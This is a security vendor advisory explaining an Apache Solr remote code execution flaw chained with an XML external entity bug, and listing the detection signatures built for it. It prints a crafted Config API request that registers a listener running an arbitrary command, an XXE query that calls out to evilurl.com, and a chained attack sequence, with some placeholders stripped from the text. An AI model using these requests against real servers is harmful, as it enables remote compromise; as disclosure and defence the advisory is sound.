Apache Solr Remote Code Execution Vulnerability

By

Apache Solr is an open source distributed search platform built on the Apache Lucene search engine library. A remote code execution vulnerability has been reported on Apache Solr before version 7.1, which allows an attacker to send certain crafted HTTP requests to execute artitrary commands on a remote server.

The code execution vulnerability

Solr uses the term “collection” to define a single search index, which is effectively a logical grouping of index data. Search queries are typically sent to Apache Solr by sending requests to the following URI:

http://:8983/solr//select?q=

where is the collection name to perform the query on, and is a query using any supported query syntax. Such request is sent via HTTP POST request, and will be handled by Apache Lucene parser.

Solr supports the use of event listeners which can be used to trigger actions based on various events sent to the collection (e.g. Update an collection). Event listeners require an event type as well as a handler class. Handler classes may be either a custom class or a built in class. Solr “RunExecutableListener” class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such listener can be enabled with any parameters just by using Config API (http://:8983/solr//config) with add-listener command:

 POST /solr/newcollection/config HTTP/1.1 Host: localhost:8983 Connection: close Content-Type: application/json Content-Length: 198  "add-listener" : { "event":"postCommit", "name":"somelistener", "class":"solr.RunExecutableListener", "exe":"[command]", <--- Arbitrary command "dir":"solr/bin", <--- Command path "args":["foo","bar"] <--- Command params } } 

When the postCommit event is triggered, the remote command will be executed on the privilege of the Solr server process.

The above mentioned vulnerability is sufficient for a local privilege escalation attack. To exploit this vulnerability without direct access to the Solr server, there is another vulnerability that can be exploited in a chained attack - The XML external entity expansion vulnerability.

The XML external entity expansion vulnerability

This vulnerability is caused by the lucene xml parser does not prohibit DOCTYPE declarations or the expansion of external entities. A query can be crafted that can cause Solr to make requests via localhost when it attempts to resolve an external entity, resulting in a server-side request forgery.

For example, when the request handled by the Apache Solr, a HTTP GET request to evilurl.com will be made.

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v=''}

Combined with this vulnerability, the attacker could send local requests to the server, turning a local code execution vulnerability to a remote RCE vulnerability.

An exploit is already in the wild on exploit-db. A real world attack consists 3 parts:

  1. Create a new collection to prepare the URL for the local code execution, using the second vulnerability to call the localhost service URL. (If a collection name is known to the attacker, this step can be skipped)
  2. Trigger the code execution vulnerability, using the collection name created in step 1.
  3. http://localhost:8983/solr//select?q=foo&qt=/solr/newcollection/config?stream.body=&shards=localhost:8983/

  4. Update "newcollection" through XXE to trigger execution of RunExecutableListener. Using the same format of request from step 3.
  5. The malicious command contained in step 2's JSON payload will be executed.

SonicWall threat Research team has analyzed the vulnerability and developed the following signatures:

  • IPS 13036: Apache Solr Remote Code Execution 1
  • IPS 13037: Apache Solr Remote Code Execution 2
Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.